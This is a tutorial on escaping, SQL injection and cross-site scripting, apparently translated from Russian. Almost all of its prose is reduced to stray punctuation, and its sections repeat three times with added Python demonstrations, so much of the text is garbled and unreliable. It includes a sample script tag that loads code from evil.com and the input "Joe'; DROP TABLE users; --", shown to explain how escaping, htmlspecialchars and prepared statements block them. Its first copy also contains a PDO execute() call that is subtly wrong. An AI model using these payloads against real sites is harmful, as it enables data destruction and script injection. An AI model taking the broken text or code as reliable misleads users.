<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>





, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>





... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>





, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'





mysql_real_escape_string



, - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>





htmlspecialchars



, , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>





, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .





Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);





, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).








 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
      

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>






, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]





, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp;



", .. : " &amp;&lt;



"





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";





- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";





! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";





... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";





"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'





, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);





, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, : - -! , - ! ! , - , ! !



, . $_POST['name']



- , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'





, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>





, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>





, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>





... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>





, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name'];
$name = mysql_real_escape_string($name);
$query = "SELECT phone_number FROM users WHERE name = '$name'";
$result = mysql_query($query);





, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'





mysql_real_escape_string



, - .



, :

<div class="post">
  <p class="meta">
    Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?>
  </p>
  <p class="body">
    <?php echo htmlspecialchars($post['body']); ?>
  </p>
</div>





htmlspecialchars



, , . :

<div class="post">
  <p class="meta">
    Posted by JackTR on July 18, 12:56
  </p>
  <p class="body">
    &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt;
  </p>
</div>





, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
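To make the point about context concrete, here is the post template from the XSS section rendered in Python with an htmlspecialchars-style escape. This is an added example, not code from the article; the two sample posts and the escape table are constructed here, and the SQL-literal escape is included only to show that escaping for one context does nothing for the other.

```python
import html

# Constructed sample posts, mirroring the posts in the article's XSS section.
POSTS = [
    {"username": "Pascal", "date": "November 23, 04:12",
     "body": "Basic math tells us that if x < n and y > n, x cannot be larger than y."},
    {"username": "JackTR", "date": "July 18, 12:56",
     "body": '<script src="http://evil.com/dangerous.js" type="text/javascript" '
             'charset="utf-8"></script>'},
]

# The characters that carry meaning in HTML text and attribute values, with
# their entity forms. '&' goes first: it is the escape character itself, and
# escaping it after the others would mangle the entities just produced.
HTML_ESCAPES = (("&", "&amp;"), ("<", "&lt;"), (">", "&gt;"), ('"', "&quot;"))


def html_special_chars(text: str) -> str:
    """HTML-context escaping in the style of PHP's htmlspecialchars() with its
    ENT_COMPAT default, which is what the article's output shows: '&', '<',
    '>' and '"' become entities; the single quote is left as it is.
    (Python's html.escape() is the same idea but also rewrites the single
    quote as &#x27;.)"""
    for raw, entity in HTML_ESCAPES:
        text = text.replace(raw, entity)
    return text


def render_post(post: dict, escape=html_special_chars) -> str:
    """The article's post template, escaping each user-supplied value at the
    point where it enters the HTML. The date is generated by the server, so it
    is the one value that is not escaped. Passing escape=str reproduces the
    vulnerable template, where values are pasted in verbatim."""
    return (
        '<div class="post">\n'
        '  <p class="meta">\n'
        f'    Posted by {escape(post["username"])} on {post["date"]}\n'
        '  </p>\n'
        '  <p class="body">\n'
        f'    {escape(post["body"])}\n'
        '  </p>\n'
        '</div>'
    )


def escape_sql_literal(text: str) -> str:
    """Standard-SQL escaping of a single-quoted string literal (double every
    quote). Shown here only as the wrong tool for an HTML context: it leaves
    '<' and '>' untouched, just as HTML escaping leaves the SQL quote alone."""
    return text.replace("'", "''")


if __name__ == "__main__":
    for post in POSTS:
        print(render_post(post))
```
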





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". .

Sanitization

"" , . , - HTML-, . , .





Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute([$_POST['name']]);  // parameters are passed as an array, separately from the SQL text





, . , .
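The three inputs from the SQL section, run through plain concatenation, escaping and a prepared statement, as an added example in Python with sqlite3 (not the article's code). The rows of the users table are constructed here; SQLite's quote doubling stands in for the escape step, and mysql_real_escape_string's backslash form is reproduced only so the article's strings can be compared.

```python
import sqlite3

# Constructed sample data for the article's users / phone_number schema.
USERS = [("Alex", "555-0100"), ("Mc'Donalds", "555-0101"), ("Joe", "555-0102")]

# The three inputs walked through in the article.
INPUT_PLAIN = "Alex"
INPUT_QUOTE = "Mc'Donalds"
INPUT_INJECTION = "Joe'; DROP TABLE users; --"


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, phone_number TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def build_query_concat(name: str) -> str:
    """The article's vulnerable pattern: the user's text is pasted into the
    SQL text, so a quote inside it is parsed as SQL rather than as data."""
    return f"SELECT phone_number FROM users WHERE name = '{name}'"


def escape_backslash_style(name: str) -> str:
    """What mysql_real_escape_string does to the quote: prefix it with a
    backslash (the article's Mc\\'Donalds). Only for reproducing the article's
    strings; SQLite does not treat a backslash as an escape, which is itself
    the lesson: escaping is specific to the consumer of the text."""
    return name.replace("\\", "\\\\").replace("'", "\\'")


def escape_sql_literal(name: str) -> str:
    """Standard-SQL escaping for a single-quoted literal: double every quote.
    This is the dialect-correct escape for SQLite (and PostgreSQL)."""
    return name.replace("'", "''")


def lookup_concat(conn: sqlite3.Connection, name: str):
    """Runs the concatenated query. A quote in the input changes the
    statement's structure; sqlite3 rejects the broken or multi-statement text
    (execute() runs exactly one statement), which keeps this demo harmless.
    Returns the phone numbers found, or the error text."""
    try:
        return [row[0] for row in conn.execute(build_query_concat(name))]
    except (sqlite3.Error, sqlite3.Warning) as exc:
        return f"error: {exc}"


def lookup_escaped(conn: sqlite3.Connection, name: str):
    """Escape-then-concatenate: the quote is now part of the literal."""
    sql = build_query_concat(escape_sql_literal(name))
    return [row[0] for row in conn.execute(sql)]


def lookup_prepared(conn: sqlite3.Connection, name: str):
    """Prepared statement: the SQL text is fixed and the value travels
    separately, so it is never parsed as SQL and needs no escaping at all."""
    sql = "SELECT phone_number FROM users WHERE name = ?"
    return [row[0] for row in conn.execute(sql, (name,))]


def table_exists(conn: sqlite3.Connection) -> bool:
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = 'users'"
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    for value in (INPUT_PLAIN, INPUT_QUOTE, INPUT_INJECTION):
        print(repr(value))
        print("  concat  :", lookup_concat(db, value))
        print("  escaped :", lookup_escaped(db, value))
        print("  prepared:", lookup_prepared(db, value))
```
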





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).












? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>






, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]





, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp;



", .. : " &amp;&lt;



"





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";





- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";





! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";





... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";





"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'





, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);





, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, : - -! , - ! ! , - , ! !



, . $_POST['name']



- , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'





, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>





, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>





, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>





... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>





, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'





mysql_real_escape_string



, - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>





htmlspecialchars




<div class="post">
  <p class="meta">
    Posted by JackTR on July 18, 12:56
  </p>
  <p class="body">
    &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt;
  </p>
</div>





, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

Sanitization

"" , . , - HTML-, . , .





Prepared SQL statements


$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute([$_POST['name']]);   // execute() takes an array of values, one per placeholder
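
As an added example, not the article's code: the same lookup and the same post rendering redone in Python, with sqlite3 parameter binding standing in for PDO's prepare()/execute() and html.escape standing in for htmlspecialchars. The users table, the phone numbers and the three inputs (Alex, Mc'Donalds, Joe'; DROP TABLE users; --) are constructed from the values used above; the block also shows what happens when a value is escaped for the wrong context.

```python
import html
import sqlite3

# Constructed sample data mirroring the article's examples (not a real dataset).
USERS = [("Alex", "555-0101"), ("Mc'Donalds", "555-0102"), ("Joe", "555-0103")]
INPUTS = ["Alex", "Mc'Donalds", "Joe'; DROP TABLE users; --"]
JACKTR_BODY = ('<script src="http://evil.com/dangerous.js" '
               'type="text/javascript" charset="utf-8"></script>')


def open_db():
    """In-memory database with the users table the article's queries refer to."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, phone_number TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    conn.commit()
    return conn


def build_query_naive(name):
    """The concatenated query from the article: the value is pasted into the SQL
    text, so a quote inside the value becomes part of the SQL grammar."""
    return f"SELECT phone_number FROM users WHERE name = '{name}'"


def run_naive(conn, name):
    """Execute the concatenated query. Returns the phone number, or the name of the
    exception class when the statement no longer parses (the Mc'Donalds case)."""
    try:
        row = conn.execute(build_query_naive(name)).fetchone()
    except (sqlite3.Error, sqlite3.Warning) as exc:
        return type(exc).__name__
    return row[0] if row else None


def lookup_phone(conn, name):
    """Parameterized query: the SQL text is fixed and the value is bound separately,
    the same code/data separation PDO's prepare()/execute() gives above."""
    row = conn.execute("SELECT phone_number FROM users WHERE name = ?", (name,)).fetchone()
    return row[0] if row else None


def table_exists(conn, table):
    """Check that a table survived, e.g. after feeding in the DROP TABLE input."""
    row = conn.execute("SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?",
                       (table,)).fetchone()
    return row is not None


def render_post(username, body):
    """HTML context: html.escape (the htmlspecialchars counterpart) turns <, >, &
    and quotes into entities, so markup inside a post stays text in the browser."""
    return ('<div class="post">'
            f'<p class="meta">Posted by {html.escape(username)}</p>'
            f'<p class="body">{html.escape(body)}</p>'
            '</div>')


def lookup_with_html_escaping(conn, name):
    """Escaping for the wrong context: HTML-escaping a SQL value removes the quote
    (' becomes &#x27;) so the query parses, but it now searches for the wrong name."""
    return lookup_phone(conn, html.escape(name))


if __name__ == "__main__":
    conn = open_db()
    for name in INPUTS:
        print("naive SQL text:", build_query_naive(name))
        print("parameterized :", lookup_phone(conn, name))
    # The third input is not run through run_naive: whether a stacked
    # DROP TABLE executes depends on the driver, not on the application.
    for name in INPUTS[:2]:
        print("naive result  :", run_naive(conn, name))
    print("users table still exists:", table_exists(conn, "users"))
    print("wrong context :", lookup_with_html_escaping(conn, "Mc'Donalds"))
    print(render_post("JackTR", JACKTR_BODY))
```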












